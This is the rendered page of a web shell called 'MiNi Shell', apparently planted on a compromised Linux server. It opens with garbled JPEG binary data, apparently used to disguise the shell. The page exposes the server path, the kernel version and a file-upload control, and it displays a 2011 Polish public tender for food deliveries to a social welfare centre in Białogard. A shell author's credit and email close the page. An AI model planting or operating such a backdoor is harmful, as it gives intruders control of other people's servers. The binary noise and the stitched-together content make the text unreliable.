JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111212/422500-N-2011.html

<p class="kh_header"><b>Białogard: Zakup i dostawa artykułów żywnościowych do Miejskiego Ośrodka Pomocy Społecznej w Białogardzie</b><br>
<b>Numer ogłoszenia: 422500 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Krótka 1, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3123077, faks 094 3123077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mops.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna Miasta Białogard.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych do Miejskiego Ośrodka Pomocy Społecznej w Białogardzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa produktu ilość (kg,szt.) I. Mięso i wędliny 1. karkówka b/k 535 kg 2. łopatka b/k, b/skóry 1948 kg 3. żołądki drobiowe 60 kg 4.schab b/k 255 kg 5. boczek świeży bez żeberek 176 kg 6. udko z kurczaka drobiowe /ćwiartka/240 kg 7. porcje rosołowe 357 kg  8. flaki wołowe świeże 60 kg  9. filet z kurczaka świeży 983 kg 10. boczek wędzony 10 kg 11. pałka z kurczaka 763kg 12. serca drobiowe 60 kg 13. smalec 375 kg 14. kiełbasa np. podwawelska, grilowa 4576 kg 15. parówka lub parówkowa 943 kg 16. kaszanka 440 kg 17. kiełbasa żywiecka 547 kg 18. baton szynkowy 62 kg 19. kiełbasa górzycka, tatrzańska 176 kg 20. pasztetowa 610 kg 21. salceson 177 kg, 22. szynka konserwowa 63 kg, 23. kiełbasa swojska 63 kg, 24. kiełbasa śląska 672 kg, 25. kiełbasa szynkowa 180 kg, 26. kiełbasa biała surowa 79 kg, 27. blok tyrolski 63 kg, 28. wątroba wieprzowa 74 kg, 29.metka cebulowa 106 kg, 30. kiełbasa jałowcowa 63 kg. II. Ryby mrożone 1. dorsz mrożony 60 kg 2. filet z mintaja mrożony 60 kg 3. filet solony śledź matjas 150 kg 4. filet z morszczuka mrożony 181 kg. III. Artykuły spożywcze 1. kasza gryczana 418 kg 2. przyprawa do karkówki 2 kg szt. 3. sól 409 kg 4. kasza jęczmienna 440 kg 5. mąka 430 kg 6. makaron: rurki, kolanka, świderki 600 kg 7. ryż 460 kg 8. przyprawa warzywko lub kucharek - 135 kg  9. przyprawa do kurczaka 3 kg 10. kwasek cytrynowy 2 kg 11. koncentrat pomidorowy (4.55 kg) 67 szt. 12. ziele angielskie 12 kg 13. papryka słodka 7 kg 14. pieprz naturalny mielony 19 kg 15. pieprz ziołowy 6 kg 16. liść laurowy 4 kg. 17. majeranek - 15 kg. 18. olej 449 l 19. ocet 43 l 20. sok-syrop 6,5 kg 111 szt. 21. cukier 112kg 22. czosnek granulowany 19 kg 23. mąka ziemniaczany 1 kg 24. sos grzybowy 6 kg 25. sos sałatkowy - 1kg 4 szt. 26. przyprawa do pieczeni 2 kg 27. przyprawa kebab-gyros 6 kg 28. zupa ogonowa 60 kg 29. zupa grzybowa 20 kg 30. sos do pieczeni ciemny 54 kg 31. żurek/ barszcz biały 19 kg 32. przyprawa prowansalska 2 kg 33. przyprawa do gulaszu 5 kg 34. przyprawa do bigosu 2 kg 35. makaron ryżyk - 500 g 282 szt. 36. makaron zacierka - 250 g 469 szt. 37. przyprawa do grila 2 kg 38. sos boloński 12 kg 39. barszcz czerwony 7 kg 40. tymianek 2 kg 41. sos do pieczeni jasny 7 kg 42. kisiel 25 kg 43. gałka muszkatołowa 1 kg 44. przyprawa do ryb 2 kg 45. papryka ostra 6 kg 46. przyprawa do potraw w płynie - 150 l.  47. rosół drobiowy 67 kg, 48.bazylia 2kg. IV. Pieczywo 1. chleb 500g krojony 10177szt. 2. bułka zwykła 70g 100 szt. 3. bułka tarta 261 kg. V. Nabiał 1. śmietana 18% - 400g 4265 szt. 2. twaróg półtłusty 20 kg. VI. Warzywa i Owoce, warzywa mrożone 1. ziemniaki 29550 kg 2. seler 60 kg 3. por 88 kg 4. marchew 210 kg 5. burak 800 kg 6. cebula 450 kg 7. kapusta świeża 111 kg 8. ogórek świeży 268 kg 9. ogórek kwaszony 342 kg 10. kapusta kwaszona 1282 kg 11. pieczarki 282 kg 12. pietruszka natka 302 szt. 13. koper 456 szt. 14. szczypior 241 szt. 15. fasola 215 kg 16. groch łuskany 294 kg 17. kapusta pekińska 188 kg 18. kapusta młoda 42 szt. 19. ogórek kwaszony tarty - przecier 228 kg 20. papryka czerwony 12 kg 21. sałata szwedzka (900g) 359 szt. 22. truskawka 12 kg 23. kapusta czerwona - sałatka 900g 297 szt. 24. jabłka 100 kg 25. chrzan tarty 134 szt. 26. szczaw konserwowy - 275g 402 szt. 27. musztarda (180g)174 szt. 28. kukurydza konserwowa 30 szt. 29. sałatka obiadowa - 900g 1288 szt. 30. jaja świeże 1234 szt. 31. czosnek świeży 3 kg. 32. marchewka z groszkiem op. 2 kg 719 kg 33. włoszczyzna paski op. 2 kg 1744 kg 34. kalafior op. 2 kg 170 kg 35. fasolka szparagowa op. 2 kg 338 kg  36.marchew kostka op.40 kg 37. marchew młoda op. 2 kg 194 kg, 38. śliwka (op. 2kg) 20 kg, 39. czarna porzeczka  (op. 2kg) 28 kg.
UWAGA: Dopuszcza się składanie ofert częściowych. Zamówienie podzielone zostało na sześć następujących części: 1. mięso i wędliny, 2. ryby mrożone, 3. artykuły spożywcze, 4. pieczywo, 5. nabiał, 6. warzywa i owoce,warzywa mrożone Dodatkowe wymogi: Wykonawca udzieli Zamawiającemu gwarancji jakości na artykuły żywnościowe na 5 dni od daty dostarczenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.00.00-2, 15.22.10.00-3, 15.81.10.00-6, 15.81.00.00-9, 15.50.00.00-1, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamwiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wskazanie, że dysponuje minimum jednym samochodem dostawczym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów złożonych przez wykonawców, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę należy złożyć na formularzu stanowiącym załącznik nr 1 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach: a) wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania niniejszej SIWZ i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia, b) wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia, c) wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mops.bialogard.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Krótka 1 78-200 Białogard pok.10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Krótka 1 78-200 Białogard pok.10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i wędliny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. karkówka b/k 535 kg 2. łopatka b/k, b/skóry 1948 kg 3. żołądki drobiowe 60 kg 4.schab b/k 255 kg 5. boczek świeży bez żeberek 176 kg 6. udko z kurczaka drobiowe /ćwiartka/240 kg 7. porcje rosołowe 357 kg  8. flaki wołowe świeże 60 kg  9. filet z kurczaka świeży 983 kg 10. boczek wędzony 10 kg 11. pałka z kurczaka 763kg 12. serca drobiowe 60 kg 13. smalec 375 kg 14. kiełbasa np. podwawelska, grilowa 4576 kg 15. parówka lub parówkowa 943 kg 16. kaszanka 440 kg 17. kiełbasa żywiecka 547 kg 18. baton szynkowy 62 kg 19. kiełbasa górzycka, tatrzańska 176 kg 20. pasztetowa 610 kg 21. salceson 177 kg, 22. szynka konserwowa 63 kg, 23. kiełbasa swojska 63 kg, 24. kiełbasa śląska 672 kg, 25. kiełbasa szynkowa 180 kg, 26. kiełbasa biała surowa 79 kg, 27. blok tyrolski 63 kg, 28. wątroba wieprzowa 74 kg, 29.metka cebulowa 106 kg, 30. kiełbasa jałowcowa 63 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. dorsz mrożony 60 kg 2. filet z mintaja mrożony 60 kg 3. filet solony śledź matjas 150 kg 4. filet z morszczuka mrożony 181 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykuły spożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. kasza gryczana 418 kg 2. przyprawa do karkówki 2 kg szt. 3. sól 409 kg 4. kasza jęczmienna 440 kg 5. mąka 430 kg 6. makaron: rurki, kolanka, świderki 600 kg 7. ryż 460 kg 8. przyprawa warzywko lub kucharek - 135 kg  9. przyprawa do kurczaka 3 kg 10. kwasek cytrynowy 2 kg 11. koncentrat pomidorowy (4.55 kg) 67 szt. 12. ziele angielskie 12 kg 13. papryka słodka 7 kg 14. pieprz naturalny mielony 19 kg 15. pieprz ziołowy 6 kg 16. liść laurowy 4 kg. 17. majeranek - 15 kg. 18. olej 449 l 19. ocet 43 l 20. sok-syrop 6,5 kg 111 szt. 21. cukier 112kg 22. czosnek granulowany 19 kg 23. mąka ziemniaczany 1 kg 24. sos grzybowy 6 kg 25. sos sałatkowy - 1kg 4 szt. 26. przyprawa do pieczeni 2 kg 27. przyprawa kebab-gyros 6 kg 28. zupa ogonowa 60 kg 29. zupa grzybowa 20 kg 30. sos do pieczeni ciemny 54 kg 31. żurek/ barszcz biały 19 kg 32. przyprawa prowansalska 2 kg 33. przyprawa do gulaszu 5 kg 34. przyprawa do bigosu 2 kg 35. makaron ryżyk - 500 g 282 szt. 36. makaron zacierka - 250 g 469 szt. 37. przyprawa do grila 2 kg 38. sos boloński 12 kg 39. barszcz czerwony 7 kg 40. tymianek 2 kg 41. sos do pieczeni jasny 7 kg 42. kisiel 25 kg 43. gałka muszkatołowa 1 kg 44. przyprawa do ryb 2 kg 45. papryka ostra 6 kg 46. przyprawa do potraw w płynie - 150 l.  47. rosół drobiowy 67 kg, 48.bazylia 2kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.41.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pieczywo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. chleb 500g krojony 10177szt. 2. bułka zwykła 70g 100 szt. 3. bułka tarta 261 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. śmietana 18% - 400g 4265 szt. 2. twaróg półtłusty 20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i Owoce, Warzywa mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . ziemniaki 29550 kg 2. seler 60 kg 3. por 88 kg 4. marchew 210 kg 5. burak 800 kg 6. cebula 450 kg 7. kapusta świeża 111 kg 8. ogórek świeży 268 kg 9. ogórek kwaszony 342 kg 10. kapusta kwaszona 1282 kg 11. pieczarki 282 kg 12. pietruszka natka 302 szt. 13. koper 456 szt. 14. szczypior 241 szt. 15. fasola 215 kg 16. groch łuskany 294 kg 17. kapusta pekińska 188 kg 18. kapusta młoda 42 szt. 19. ogórek kwaszony tarty - przecier 228 kg 20. papryka czerwony 12 kg 21. sałata szwedzka (900g) 359 szt. 22. truskawka 12 kg 23. kapusta czerwona - sałatka 900g 297 szt. 24. jabłka 100 kg 25. chrzan tarty 134 szt. 26. szczaw konserwowy - 275g 402 szt. 27. musztarda (180g)174 szt. 28. kukurydza konserwowa 30 szt. 29. sałatka obiadowa - 900g 1288 szt. 30. jaja świeże 1234 szt. 31. czosnek świeży 3 kg. 32. marchewka z groszkiem op. 2 kg 719 kg 33. włoszczyzna paski op. 2 kg 1744 kg 34. kalafior op. 2 kg 170 kg 35. fasolka szparagowa op. 2 kg 338 kg  36.marchew kostka op.40 kg 37. marchew młoda op. 2 kg 194 kg, 38. śliwka (op. 2kg) 20 kg, 39. czarna porzeczka  (op. 2kg) 28 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com